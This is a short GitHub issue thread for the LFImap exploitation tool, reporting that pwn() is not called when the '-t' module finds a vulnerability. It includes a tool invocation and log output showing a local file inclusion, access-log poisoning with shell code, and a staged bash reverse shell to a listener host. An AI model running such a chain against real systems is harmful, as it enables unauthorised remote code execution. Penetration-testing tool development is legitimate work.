Closed hansmach1ne closed 5 months ago
Fixed in https://github.com/hansmach1ne/LFImap/commit/dae069404ef1b704ccb238db117a05f02635edcd
└─$ python3 lfimap.py -U "94.237.63.201:50722?language" -t --lhost 10.10.15.203 --lport 99 -x -P "127.0.0.1:8080"
[i] Testing GET 'language' parameter...
[+] LFI -> 'http://94.237.63.201:50722?language=/etc/passwd'
[?] Checking if bash is available on the target system...
[*] Starting reverse listener on 0.0.0.0:99
[i] Enumerating file system to discover access log location...
[.] Located canary in target's access log at '/var/log/apache2/access.log'
[.] Poisoning access log with the shell code...
[.] Trying to pop reverse shell to 10.10.15.203:99 using bash via access log poisoning...
[.] Executing stage 1 of the revshell payload...
[.] Executing stage 2 of the revshell payload. Check your listener...
<SNIP>
pwn() is not called when '-t' module finds the vulnerability